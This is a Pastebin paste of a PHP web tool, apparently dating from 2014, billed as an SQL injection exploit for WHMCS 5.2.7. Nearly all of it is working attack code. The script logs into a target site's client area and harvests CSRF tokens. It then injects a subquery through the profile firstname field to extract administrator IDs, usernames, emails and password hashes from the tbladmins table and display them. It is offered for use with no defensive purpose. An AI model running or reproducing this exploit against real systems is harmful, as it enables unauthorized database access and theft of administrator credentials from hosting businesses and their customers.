Newbie4rt-ID

Script WHMCS v5.2.7 Sql Injection

Nov 11th, 2014
356
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.79 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Master WHMCS 5.2.7 SQL inJecTion</title>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  5.  
  6.   <style type='text/css'>
  7.   body{
  8.         margin: 0;
  9.         padding:0;
  10.         background:black;
  11.         color:white;
  12.         font-family:"Times New Roman",Georgia,Serif;
  13.     }
  14.     </style>
  15. </head>
  16. <body >
  17. <center>
  18.  
  19. <h1> Master WHMCS 5.2.7 SQL inJecTion</h1>
  20.  
  21. <img src="http://www.whmcs.com/wp-content/themes/whmcs/images/logo_whmcs.png" /> <br /><br />
  22. <?
  23.  
  24. if ($_POST['Submit1']){
  25. echo "";
  26. set_time_limit(0);
  27. function cut($start,$end,$top){
  28. $c =strlen($start);
  29. $desc= strstr("$top","$start");
  30. $count = strpos("$desc","$end");
  31. $desc = substr($desc,$c,$count-$c);
  32. return $desc;
  33. }
  34.  
  35.  
  36. $url= $_POST['user'];
  37. $user= $_POST['email'];
  38. $passw= $_POST['pass'];
  39.  
  40. $sqll= "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins";
  41.  
  42. $fp = fopen("cookie.txt", "w+");
  43. $Cookie = realpath('cookie.txt');
  44.  
  45. $curl=curl_init();
  46. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  47. curl_setopt($curl,CURLOPT_URL,"$url/login.php");
  48. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  49. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  50. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  51. $exec=curl_exec($curl);
  52. curl_close($curl);
  53. $tok = cut('"token" value="','" />',$exec);
  54. $postd= "username=$user&password=$passw&token=$tok";
  55. $curl=curl_init();
  56. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  57. curl_setopt($curl,CURLOPT_URL,"$url/dologin.php");
  58. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  59. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  60. curl_setopt($curl, CURLOPT_POSTFIELDS, $postd);
  61. curl_setopt($curl, CURLOPT_COOKIEJAR, "$Cookie");
  62. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  63. $exez=curl_exec($curl);
  64. curl_close($curl);
  65.  
  66. $curl=curl_init();
  67. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  68. curl_setopt($curl,CURLOPT_URL,"$url/clientarea.php?action=details");
  69. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  70. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  71. curl_setopt($curl, CURLOPT_COOKIEFILE, "$Cookie");
  72. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  73. $exes=curl_exec($curl);
  74. curl_close($curl);
  75. $tokZ = cut('"token" value="','" />',$exes);
  76.  
  77.  
  78. $zz= "AES_ENCRYPT(1,1), firstname= ($sqll)";
  79.  
  80. $ex="token=$tokZ&firstname=$zz&lastname=1&companyname=1&email=$user&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes";
  81. $curl=curl_init();
  82. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  83. curl_setopt($curl,CURLOPT_URL,"$url/clientarea.php?action=details");
  84. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  85. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  86. curl_setopt($curl, CURLOPT_POST, TRUE);
  87. curl_setopt($curl, CURLOPT_POSTFIELDS, $ex);
  88. curl_setopt($curl, CURLOPT_COOKIEFILE, "$Cookie");
  89. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  90. $exef=curl_exec($curl);
  91. curl_close($curl);
  92. $Masterr = cut('="firstname" value="','" />',$exef);
  93.  
  94. if(!empty($Masterr)){
  95. $Masterr= str_replace (',','<br />',$Masterr);
  96. echo "$Masterr";
  97. }
  98. else{
  99. echo "<h2>Failed .. !!</h2>";
  100. }
  101.  
  102.  
  103. }
  104. ?>
  105. <b>
  106. <FORM NAME ="form1" METHOD ="POST" ACTION ="">
  107.  
  108. <br>
  109. Site : <INPUT NAME = "user" style="width: 410px; " value="<? echo $_POST['user'];?>"><br><br>
  110. mail : <INPUT NAME = "email" style="width: 410px; " value="<? echo $_POST['email'];?>"><br><br>
  111. pass : <INPUT NAME = "pass" style="width: 410px; " value="<? echo $_POST['pass'];?>"><br><br>
  112.  
  113. <br> <INPUT TYPE = "Submit" Name = "Submit1" VALUE = "Expoit" style="width: 90px">
  114.  
  115. </FORM>
  116. <p>Developped By The_Master</p>
  117. <p>Th3.M4st3r@Yahoo.CoM</p>
  118. <p>SEc4ever.CoM</p>
  119. </b>
  120.  
  121. </div>
  122. <center></body>
  123. </html>
Add Comment
Please, Sign In to add comment